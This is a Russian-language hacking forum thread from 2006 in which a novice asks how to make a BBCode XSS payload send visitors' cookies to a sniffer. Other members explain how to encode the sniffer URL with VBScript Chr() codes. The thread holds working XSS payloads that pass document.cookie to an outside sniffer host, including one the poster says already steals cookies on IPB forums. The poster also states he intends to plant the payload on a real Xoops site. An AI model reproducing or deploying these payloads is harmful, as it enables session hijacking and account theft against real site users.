Как в такой XSS указать путь к античтовскому снифферу?

Discussion in 'Уязвимости' started by Vovec, 25 Feb 2006.

  1. Vovec

    Vovec New Member

    Joined:
    31 Aug 2005
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    Помогите перваку, как в такой XSS
    HTML:
     [color=FFFFFF;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/color] 
    указать путь к античатовскому снифферу. Вопрос лажовый, думаю вам ответить на него пару пустяков...
     
    #1 Vovec, 25 Feb 2006
    Last edited: 25 Feb 2006
  2. Nova

    Nova Green member

    Joined:
    15 Jul 2005
    Messages:
    1,234
    Likes Received:
    418
    Reputations:
    280
    И как ты предстовляеш себе реализаию XSS с элементами C++ если я не ошибаюсь ???
     
    _________________________
  3. Electro

    Electro Elder - Старейшина

    Joined:
    23 Oct 2005
    Messages:
    243
    Likes Received:
    45
    Reputations:
    39
    Я ничё не понял
     
  4. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    там vbscript, а Chr( ) это встроенная функция, возвращающая символ, имеющий заданный код ASCII

    коды ASCII - http://electronics.sortos.ru/docs/ascii_table.html

    составляешь цепочку из Chr() где и будет твой код сниффера и не забудь пробел убрать ("repl ace" -> "replace")

    ;)

    незабудь про ±
     
    #4 vectorg, 25 Feb 2006
    Last edited: 25 Feb 2006
  5. Meister

    Meister Elder - Старейшина

    Joined:
    13 Oct 2005
    Messages:
    184
    Likes Received:
    7
    Reputations:
    0
    все ответили так же как и я только у меня у одного пост удалили почему-то.
     
  6. Vovec

    Vovec New Member

    Joined:
    31 Aug 2005
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    VectorG я то тебе + могу поставить, мне ни жалко...Только я ничерта не понял, как должна быть выгледеть это цепочка, чтоб в ней был код сниффера...
    Попробую спросить вас по другому, что мне надо добавить в этот XSS, чтоб после его, размешенния куки пользователей приходили на сниффер.
    Вот например после размешенния вот такой XSS
    HTML:
    [em*ail]wj@wj[u*rl=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://site/snif.jpg?"+document.cookie);`
    на IPB мне сливаються куки. Вот как в той XSS реализовать это, если это вообще возможно?
     
  7. Vovec

    Vovec New Member

    Joined:
    31 Aug 2005
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    VectorG я понял так твой пост...
    Если URL к снифферу будет выглядить например вот так "http://site/snif.php" то мне надо в скобки Chr вставлять каждый символ URL'а , тоесть например http должно выглядить так, к примеру по коду Decimal из таблицы ASCII

    Code:
    Chr(104)+Chr(116)+Chr(116)+Chr(112)
    Я правильно понял? Если нет, то ни мог бы ты поконкретний объяснить?
     
    #7 Vovec, 25 Feb 2006
    Last edited: 26 Feb 2006
  8. Xex

    Xex Banned

    Joined:
    10 Jul 2005
    Messages:
    108
    Likes Received:
    41
    Reputations:
    7
    To Vovec: ты прально понял...
     
  9. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    757
    Likes Received:
    351
    Reputations:
    353
    Vovec, а в чем вопрос? тебе дали таблицу аски. Ты хочешь, чтобы тебе перевели http://site/snif.php к виду chr()? Ну тогда предоставь полный адрес снифера. И то не знаю есть ли здесь альтруисты... ;)
     
  10. Vovec

    Vovec New Member

    Joined:
    31 Aug 2005
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    podkashey да не, я всё что к чему уже понял, сначало просто не догнал.Только есть ещё вапросы, на которые я надеюсь вы дадите ответы. Если я укажу URL каторый я указал ниже, в кодах ACSII к примеру,то он будет работать или я его не правильно сформировал? И ещё вопрос, в коды ACSII надо загонять только URL, или также всё что идёт после s.jpg
    Code:
    http://antichat.ru/cgi-bin/s.jpg?+document.cookie
    Больше негде спросить, кроме как у вас...
     
  11. bul666

    bul666 Banned

    Joined:
    21 Apr 2005
    Messages:
    285
    Likes Received:
    8
    Reputations:
    -1
    http://antichat.ru/cgi-bin/s.jpg?+document.cookie


    Вот проверь
     
    1 person likes this.
  12. Vovec

    Vovec New Member

    Joined:
    31 Aug 2005
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    Конеш спасибо что не поленилься мне Url перевести в Ascii код, держи за это + , но проверить мне негде, на том сайте на катором я хотел это разместить это палевно(нельзя потом удалить), а на лакалхосте немогу так как не могу найти Xoops этой версии, больная старая она наверно=) Да и вообще я сомневаюсь что на том сайте где я хотел разместить этот Xss та версия. Лучше подскажите мне прогу которой лучше всего определять версию движков?
     
Loading...
Similar Threads - указать античтовскому снифферу
  1. jakonda1001
    Replies:
    4
    Views:
    2,792
  2. Edward007
    Replies:
    6
    Views:
    4,268
  3. reuvenmatbil
    Replies:
    4
    Views:
    2,366